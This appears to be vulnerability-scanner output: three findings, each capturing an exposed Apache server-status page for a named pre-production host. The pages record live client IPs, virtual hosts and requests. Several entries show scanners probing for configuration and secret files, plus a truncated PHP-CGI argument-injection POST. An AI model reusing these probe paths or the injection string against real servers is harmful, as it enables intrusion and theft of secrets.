142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-2938510400/347/8349_ 27.5041919785470.07.83199.43 142.93.0.66http/1.1 1-2938510400/415/7810_ 27.522014195090.019.37162.48 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-2938510400/348/7875_ 27.47352516710720.06.46204.11 142.93.0.66http/1.1 1-2938510400/329/8268_ 27.512014591930.015.15164.72 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-2938510400/346/8814_ 27.43254619644110.015.59209.40 104.23.190.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2938510400/335/8364_ 27.520036777990.08.81196.60 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-2938510400/336/8801_ 27.500614339840.019.35201.50 142.93.0.66h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2938510400/327/7370W 27.410015057890.029.53159.96 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-2938510400/372/8339_ 27.464012425380.012.41142.92 142.93.0.66http/1.1 2-2938511740/111/3858_ 15.5911016716941020.02.3988.84 172.71.30.80h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2938511740/115/3736_ 15.20105011063580.02.9395.83 162.158.122.136h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-2938511740/189/4052_ 15.555010993310.04.7786.96 172.70.44.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2938511740/117/3853_ 14.13229211934510.02.83164.94 185.242.226.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2938511740/96/3863_ 15.54105011260490.02.44126.61 188.114.111.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2938511740/127/3744_ 15.20105013533780.04.29135.50 185.242.226.118http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2938511740/125/4054_ 15.625021310710.03.99134.99 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 2-2938511740/116/3722_ 13.55509485340.03.5079.77 142.93.0.66h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2938511740/90/3944_ 15.620015504440.02.36101.11 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-2938511740/106/3844_ 13.555016752620.01.26117.72 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-2938510410/396/5045_ 29.37209207850.039.90159.59 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-2938510410/393/4752_ 29.381016128010.013.85139.91 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-2938510410/361/5111_ 29.2823309059240.016.83128.74 162.158.122.97h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2938510410/384/4941_ 29.3235878909870.017.04150.31 142.93.0.66h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-2938510410/379/4913_ 29.342378825110.08.22127.77 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 3-2938510410/462/5188_ 29.380012597310.08.29140.21 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-2938510410/456/5013_ 29.37318360590.09.37139.74 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-2938510410/363/5451_ 29.381071205630.014.81144.88 142.93.0.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-2938510410/369/4687_ 29.3331899398490.06.98120.86 142.93.0.66http/1.1 3-2938510410/337/5951_ 29.3204818987540.024.27129.76 142.93.0.66h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-2938510380/37/4595_ 9.371378212760820.00.98147.81 64.31.2.156http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2938510380/36/3945_ 10.852372611953970.00.45163.50 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2938510380/39/4619_ 11.79133257517881350.00.9594.89 172.70.127.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2938510380/33/4640_ 11.771383185421318310.07.59166.31 162.158.123.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2938510380/37/4369_ 11.00237011408690.00.74113.88 172.70.108.151h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2938510380/36/4011_ 12.09242315130540.01.12181.11 170.246.210.246http/1.1barrerasdecontencion.com:443GET /wp-content/uploads/2017/09/inundacion-01.png HTTP/1.1 4-2938510380/42/4924_ 10.98
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b278bedeb69
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 18-Sep-2025 10:55:40 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 28 Parent Server MPM Generation: 27 Server uptime: 5 days 21 hours 34 minutes 37 seconds Server load: 0.33 0.21 0.16 Total accesses: 244438 - Total Traffic: 6.5 GB - Total Duration: 77819814 CPU Usage: u225.37 s118.6 cu895.32 cs472.92 - .336% CPU load .48 requests/sec - 13.3 kB/second - 27.7 kB/request - 318.362 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03778787no1yes010000 13778788no1yes010000 23778925no1yes010000 33778789no0yes19000 43778786no1yes010000 Sum504 149000 ______________________________________W___________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2737787870/1166/4764_ 71.820015112170.021.48120.13 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-2737787870/1143/4687_ 71.803012644030.032.06163.02 167.172.158.128http/1.1 0-2737787870/1164/5135_ 71.693020596990.052.39214.39 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2737787870/1072/4697_ 71.830016853030.027.17149.32 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-2737787870/1201/5095_ 71.7601712626180.043.19125.14 162.158.120.218h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2737787870/1250/5105_ 71.821021961690.028.59131.95 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-2737787870/1154/5071_ 71.7533825429190.034.99107.66 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2737787870/993/4934_ 71.805217427540.047.10168.34 162.158.23.215h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2737787870/1108/5004_ 71.820120646640.028.23135.51 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-2737787870/1251/4905_ 71.821018369820.050.24182.04 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-2737787880/468/6613_ 49.595012520300.011.38143.48 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-2737787880/591/7400_ 49.6021717515100.013.20166.68 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-2737787880/531/6643_ 49.602011782060.09.13129.65 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-2737787880/559/6702_ 49.583013953860.032.47165.90 167.172.158.128http/1.1 1-2737787880/792/7127_ 49.611012340810.011.11140.27 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-2737787880/695/7629_ 49.404016907040.011.25164.84 167.172.158.128http/1.1 1-2737787880/585/7434_ 49.4341934428210.026.36172.24 167.172.158.128http/1.1 1-2737787880/502/7813_ 49.610012030520.07.44142.36 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2737787880/448/6464_ 49.602012685180.09.28117.14 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-2737787880/458/7302_ 49.574349914040.011.15120.35 167.172.158.128http/1.1 2-2737789250/1351/3450_ 84.003216096360.034.9575.36 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-2737789250/1270/3343_ 83.94145010022410.032.7885.02 165.225.92.143http/1.1relehse.com:443GET /storage/images/companies/pHzxg5iabJv0W1C2BquL93Kf4VlOAYQ3e 2-2737789250/1267/3559_ 83.94229978260.036.7675.85 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/wysiwyg-editor-bootstrap/src/js/wysiw 2-2737789250/1424/3498_ 83.94139310931750.030.13151.57 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/datatables/jquery.dataTables.min.js H 2-2737789250/1288/3445_ 83.94144010425770.044.30113.50 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/jtree-drag-drop/css/32px.png HTTP/1.1 2-2737789250/1289/3360_ 83.94145012628440.060.95125.28 165.225.92.143http/1.1relehse.com:443GET /admin_layout/assets/css/font/fontawesome-webfont.woff?v=3. 2-2737789250/1440/3720_ 83.94145020473880.065.59125.00 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/select2/select2.png HTTP/1.1 2-2737789250/1151/3277_ 83.8786118463050.027.2269.27 80.36.13.89http/1.1 2-2737789250/1352/3402_ 83.94145014339520.030.5085.09 165.225.92.143http/1.1relehse.com:443GET /storage/images/companies/pHzxg5iabJv0W1C2BquL93Kf4VlOAYQ3e 2-2737789250/1224/3437_ 83.93139015934350.030.77107.38 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/bootbox/bootbox.js HTTP/1.1 3-2737787890/529/4597_ 49.5115307518030.08.65117.64 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/noty/jquery.noty.js HTTP/1.1 3-2737787890/501/4301_ 49.51153013690800.012.77124.40 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/uniform/jquery.uniform.min.js HTTP/1. 3-2737787890/546/4646_ 49.5115317540830.012.30110.68 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/bootbox/bootbox.js HTTP/1.1 3-2737787890/561/4495_ 49.5115307139770.012.86131.83 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/blockui/jquery.blockUI.min.js HTTP/1. 3-2737787890/579/4474_ 49.5014807207410.040.68115.81 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/flot/jquery.flot.selection.min.js HTT 3-2737787890/549/4666_ 49.50148010977190.026.14130.66 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/easy-pie-chart/jquery.easy-pie-chart. 3-2737787890/451/4498_ 49.5215346048990.013.64129.35 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/wysiwyg-editor-bootstrap/src/js/highl 3-2737787890/744/5021_ 49.51153269657450.037.09129.31 165.225.92.143http/1.1relehse.com:443GET /admin_layout/plugins/select2/select2.min.js HTTP/1.1 3-2737787890/463/4259W 49.51007630860.011.39112.64 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-2737787890/615/5559_ 49.52153017400620.012.98104.58 165.225.92.143http/1.1relehse.com:443GET /admin_layout/assets/img/sidebar/sidebar-divider-dots.png H 4-2737787860/671/4529_ 58.659012653540.014.38146.27 165.225.92.143http/1.1relehse.com:443GET /admin_layout/assets/img/modules/icon_module5.jpg HTTP/1.1 4-2737787860/658/3877_ 58.71114511473550.053.76162.19 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2737787860/654/4539_ 58.6511017526740.017.1792.70 165.225.92.143http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/nestable.css HTTP/1.1 4-2737787860/644/4576_ 58.7241721200490.035.35156.81 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-2737787860/698/4291_ 58.724011226600.030.80111.79 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-2737787860/644/3940_ 58.73
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27bf01d3b7
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 17-Sep-2025 11:26:05 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 26 Parent Server MPM Generation: 25 Server uptime: 4 days 22 hours 5 minutes 2 seconds Server load: 0.12 0.25 0.27 Total accesses: 199706 - Total Traffic: 5.0 GB - Total Duration: 56172945 CPU Usage: u39.41 s27.23 cu854.09 cs456.39 - .324% CPU load .47 requests/sec - 12.4 kB/second - 26.4 kB/request - 281.278 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03771296no1yes010000 13771297no1yes010000 23771298no1yes19000 33771429no1yes010000 43771295no1yes010000 Sum505 149000 ____________________________W_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2537712960/30/3587_ 3.5234113304830.01.5098.56 162.10.195.122http/1.1 0-2537712960/21/3532_ 3.7634011125460.00.45130.81 172.68.134.91h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537712960/20/3951_ 3.5229016535650.00.43160.88 172.71.183.32h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537712960/19/3608_ 3.52321015153940.00.55122.06 172.71.102.174h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537712960/23/3885_ 3.780010782010.00.4881.82 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2537712960/19/3839_ 3.5128020425380.00.61103.24 172.71.95.82h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537712960/36/3905_ 3.5328022445230.00.5372.49 104.23.166.177h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537712960/22/3929_ 3.6029012941170.00.32121.16 162.158.120.156h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537712960/19/3884_ 3.7733018699150.00.67107.22 172.68.134.127h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537712960/27/3642_ 3.52321016726120.00.42131.74 104.23.166.17h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/320/6131_ 8.7734011742920.04.70132.00 172.68.134.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/182/6796_ 8.62342816726750.01.99153.16 79.148.250.12h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/105/6095_ 8.731692310924240.02.08120.37 80.36.13.89h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/151/6130_ 8.651692413013540.04.12133.35 195.55.66.162h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/173/6318_ 8.652829911037540.02.50128.87 172.64.237.19h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/190/6919_ 8.68291916042880.03.47153.32 195.55.66.162h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/184/6831_ 8.5829133279730.03.60145.64 162.10.195.122http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/322/7294_ 8.7833111357700.05.46134.20 172.68.134.39h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/112/5999_ 8.6616940811784610.03.46107.53 172.70.134.58h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537712970/153/6830_ 8.582809057940.02.25109.05 162.10.195.122http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2537712980/188/1908_ 9.84008913330.04.6435.39 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-2537712980/162/1919_ 9.761224785180.03.2247.97 142.93.143.8http/1.1 2-2537712980/218/2116_ 9.78205832890.02.4033.97 142.93.143.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2537712980/254/1976_ 9.84005318670.04.16118.88 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-2537712980/166/2049_ 9.8204345463060.015.7567.65 172.71.124.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2537712980/160/1981_ 9.84008777100.03.8162.83 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-2537712980/259/2124_ 9.7811811749320.03.3057.60 142.93.143.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-2537712980/154/1996_ 9.791484339230.04.0939.80 142.93.143.8http/1.1 2-2537712980/206/1938W 9.62009318470.03.2851.90 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-2537712980/278/2072_ 9.81223211600360.04.4672.91 142.93.143.8http/1.1 3-2537714290/22/4063_ 3.2046706677260.00.20108.68 104.23.166.106h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537714290/19/3793_ 3.4334112524320.00.79111.34 172.68.134.51h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537714290/22/4098_ 3.282906344020.00.1998.36 162.10.195.122http/1.1relehse.com:443GET /admin_layout/plugins/datatables/extensions/Responsive/js/d 3-2537714290/27/3933_ 3.292845953900.00.58118.94 162.10.195.122http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537714290/30/3891_ 3.282915870120.00.5574.83 162.10.195.122http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537714290/28/4114_ 3.4333010044720.00.28104.52 172.68.134.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537714290/24/4042_ 3.283305186190.00.78115.67 162.10.195.122http/1.1relehse.com:443GET /admin_layout/plugins/flot/jquery.flot.time.min.js HTTP/1.1 3-2537714290/23/4277_ 3.292808114230.00.2092.23 162.10.195.122http/1.1relehse.com:443GET /storage/images/companies/BJKQ6SEjKSb32Cc8cUyNNgWbwDlZYAfMc 3-2537714290/25/3792_ 3.20206293310.00.70101.21 142.93.143.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-2537714290/28/4941_ 3.2734016453980.01.0391.55 162.10.195.122http/1.1relehse.com:443GET /admin_layout/assets/css/plugins/nprogress.css HTTP/1.1 4-2537712950/355/3793_ 15.60008744230.06.63130.39 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-2537712950/284/3156_ 15.60109539690.05.98106.96 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-2537712950/441/3809_ 15.60009568710.05.1773.16 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-2537712950/477/3850_ 15.591011642570.010.81118.79 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-2537712950/348/3522_ 15.4806039149340.05.0178.75 142.93.143.8http/1.1 4-2537712950/298/3240_ 15.59108372210.03.80147.51 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-2537712950/690/4090
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27d794c721
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 17-Sep-2025 07:08:02 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 4 days 17 hours 46 minutes 59 seconds Server load: 0.13 0.07 0.02 Total accesses: 187737 - Total Traffic: 4.8 GB - Total Duration: 54244958 CPU Usage: u18.09 s20.81 cu831.41 cs440.91 - .32% CPU load .458 requests/sec - 12.2 kB/second - 26.6 kB/request - 288.941 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03762102no4yes19011 13762103no0yes010000 23762104no0yes010000 33762234no3yes010002 43762101no0yes010000 Sum507 149013 _____W____________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2337621020/40/3434_ 3.970013145800.00.8295.42 46.101.111.185http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2337621020/53/3403_ 4.060010876380.01.51127.39 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-2337621020/54/3800_ 4.05014716411390.00.63159.31 108.162.242.71h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2337621020/43/3485_ 4.010014881280.00.42119.64 46.101.111.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-2337621020/55/3660_ 4.060010584020.00.7579.14 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2337621020/52/3598W 4.030020153710.00.7893.68 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-2337621020/46/3745_ 3.9711022116660.00.6670.06 46.101.111.185http/1.1 0-2337621020/45/3796_ 4.060012738780.00.47119.95 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-2337621020/51/3559_ 4.060018532480.00.36101.20 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-2337621020/44/3490_ 4.01034816498490.01.17128.87 162.158.172.78h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2337621030/5/5803_ 1.9459118511268900.00.03127.25 141.101.76.183h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2337621030/2/6610_ 1.77399016470100.00.00151.07 172.70.211.169h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2337621030/1/5986_ 0.33404010627780.00.00118.28 162.158.30.137h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2337621030/2/5976_ 0.54132612552950.00.02129.22 46.101.111.185http/1.1 1-2337621030/3/6144_ 2.02405010773230.00.00126.37 162.158.41.64h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2337621030/3/6723_ 2.150015740890.00.00149.07 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-2337621030/2/6641_ 0.7058647033010800.00.03141.98 198.41.227.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2337621030/1/6971_ 1.2739933311053240.00.00128.74 172.69.136.200h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2337621030/2/5837_ 0.33586011489840.00.00103.86 207.154.212.207http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2337621030/1/6673_ 0.34116708829090.00.58106.77 162.158.30.142h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2337621040/6/1714_ 2.045944018428830.00.0630.75 104.23.166.67h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2337621040/2/1750_ 1.62116204393310.00.0144.71 152.53.239.248http/1.1cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2337621040/3/1895_ 0.6959205286960.00.0031.54 143.110.243.94http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2337621040/1/1715_ 0.3358904955650.00.00114.49 141.101.100.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2337621040/4/1877_ 1.7759205017770.00.0151.80 108.162.245.11h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2337621040/2/1813_ 0.33116268321730.00.0058.88 52.204.132.161http/1.1 2-2337621040/3/1861_ 2.0359730811240930.00.0254.28 104.23.172.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2337621040/3/1839_ 1.5258903933730.00.0535.66 172.69.151.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2337621040/1/1727_ 2.23108939420.00.0048.61 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-2337621040/2/1790_ 1.84123811248940.00.0068.40 172.70.210.210h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2337622340/54/3913_ 4.33016451570.00.58106.94 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-2337622340/54/3607_ 4.350012289460.01.99108.97 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-2337622340/60/3926_ 4.34006106590.01.1889.22 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-2337622340/49/3760_ 4.34005694090.00.44104.72 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-2337622340/57/3670_ 4.320275596390.00.8571.01 46.101.111.185h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2337622340/57/3922_ 4.3322069801720.00.98102.97 46.101.111.185http/1.1 3-2337622340/55/3889_ 4.302164891080.00.60112.68 46.101.111.185http/1.1 3-2337622340/42/3928_ 4.10007809030.00.8886.99 46.101.111.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-2337622340/51/3614_ 4.34116073960.00.4498.67 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-2337622340/45/4669_ 4.24152516248580.00.9388.03 172.70.178.10h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2337621010/4/3427_ 1.89116707906170.00.06122.77 162.158.186.45h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2337621010/3/2865_ 1.88117309124580.00.00100.83 172.70.215.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2337621010/1/3361_ 0.35116808973990.00.0067.69 162.158.30.153h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2337621010/1/3364_ 0.351173010508480.00.00107.75 64.227.120.99http/1.1 4-2337621010/3/3166_ 0.75135618656950.00.0073.56 